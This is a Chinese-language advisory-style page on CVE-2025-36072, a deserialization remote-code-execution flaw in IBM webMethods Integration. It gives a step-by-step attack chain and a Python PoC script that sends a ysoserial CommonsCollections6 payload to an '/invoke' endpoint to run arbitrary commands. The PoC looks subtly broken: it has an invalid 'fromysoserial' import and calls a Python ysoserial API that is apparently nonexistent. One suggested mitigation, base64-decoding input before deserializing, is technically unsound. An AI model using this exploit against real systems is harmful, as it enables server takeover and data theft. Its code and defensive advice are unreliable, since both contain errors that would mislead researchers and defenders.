CVE-2025-36072 IBM webMethods Integration 反序列化远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-36072

漏洞类型

反序列化漏洞/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM webMethods Integration

漏洞概述

CVE-2025-36072是IBM webMethods Integration中发现的一个高危安全漏洞。该漏洞影响10.11至10.11_Core_Fix22、10.15至10.15_Core_Fix22以及11.1至11.1_Core_Fix6版本。漏洞根源在于应用程序对不可信的对象图数据进行反序列化处理，攻击者可以利用这一缺陷在目标系统上执行任意代码。鉴于该漏洞的CVSS评分达到8.8（高危级别），且攻击复杂度较低，攻击者无需特殊网络位置或高级权限即可实现攻击。成功利用此漏洞可能导致敏感数据泄露、系统完全沦陷等严重后果。IBM官方已发布安全公告，建议用户尽快升级到最新修复版本以消除安全风险。

技术细节

该漏洞是由于IBM webMethods Integration在处理用户输入时，对包含恶意序列化对象的请求进行了不安全的反序列化操作。攻击者通过构造特制的序列化数据流，利用Java反序列化机制中存在的安全隐患，在反序列化过程中触发恶意代码执行。由于该应用允许认证用户提交数据，且未对反序列化对象进行充分的输入验证和安全性检查，低权限用户即可利用此漏洞提升权限并执行任意系统命令。攻击者通常通过发送包含恶意序列化payload的HTTP请求到目标服务器，触发目标系统上的代码执行。常见的利用方式包括使用ysoserial等工具生成针对特定 gadget 链的序列化payload。

攻击链分析

STEP 1

步骤1

攻击者识别目标IBM webMethods Integration服务器版本，确认其属于受影响版本范围（10.11-10.11_Core_Fix22、10.15-10.15_Core_Fix22、11.1-11.1_Core_Fix6）

STEP 2

步骤2

使用ysoserial等工具生成针对Java反序列化漏洞的恶意序列化payload，选择合适的gadget链（如CommonsCollections6）构造命令执行payload

STEP 3

步骤3

通过认证获取的账户或利用其他低权限账户登录webMethods Integration平台

STEP 4

步骤4

构造包含恶意序列化对象的HTTP请求，发送到目标服务器的反序列化接口（如/invoke端点）

STEP 5

步骤5

服务器接收到请求后对序列化数据进行反序列化处理，触发payload中的恶意代码执行

STEP 6

步骤6

攻击者成功在目标服务器上执行任意系统命令，可进一步进行横向移动、数据窃取或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
fromysoserial import GeneratePayload

# CVE-2025-36072 PoC - IBM webMethods Integration RCE via Deserialization
# Target: IBM webMethods Integration versions 10.11-10.11_Core_Fix22, 10.15-10.15_Core_Fix22, 11.1-11.1_Core_Fix6

def generate_payload(command):
    """Generate malicious serialized payload using ysoserial"""
    try:
        # Generate CommonsCollections6 gadget chain payload
        payload = GeneratePayload('CommonsCollections6', command)
        return payload.getObject()
    except Exception as e:
        print(f"[-] Error generating payload: {e}")
        return None

def exploit(target_url, command):
    """Send malicious payload to vulnerable endpoint"""
    # Generate payload
    payload = generate_payload(command)
    if not payload:
        return False
    
    # Target endpoint (typical webMethods Integration API endpoint)
    endpoint = f"{target_url}/invoke"
    
    headers = {
        'Content-Type': 'application/x-java-serialized-object',
        'User-Agent': 'Mozilla/5.0'
    }
    
    try:
        print(f"[*] Sending payload to {endpoint}")
        response = requests.post(endpoint, data=payload, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print("[+] Payload delivered successfully")
            return True
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <command>")
        print(f"Example: {sys.argv[0]} http://target.com:5555 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    exploit(target, cmd)

影响范围

IBM webMethods Integration 10.11 < 10.11_Core_Fix22

IBM webMethods Integration 10.15 < 10.15_Core_Fix22

IBM webMethods Integration 11.1 < 11.1_Core_Fix6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制对webMethods Integration管理接口的网络访问，仅允许受信任的IP地址访问；2）禁用不必要的服务端口，特别是可能触发反序列化的API端点；3）部署入侵检测系统监控异常的序列化数据流量；4）审查并限制用户权限，避免低权限用户访问敏感功能；5）考虑在反序列化前对输入数据进行base64解码或其他预处理以破坏恶意payload结构。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36072
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36072
3 Details https://www.cvedetails.com/cve/CVE-2025-36072/
4 VulDB https://vuldb.com/cve/CVE-2025-36072
5 Link https://www.ibm.com/support/pages/node/7252090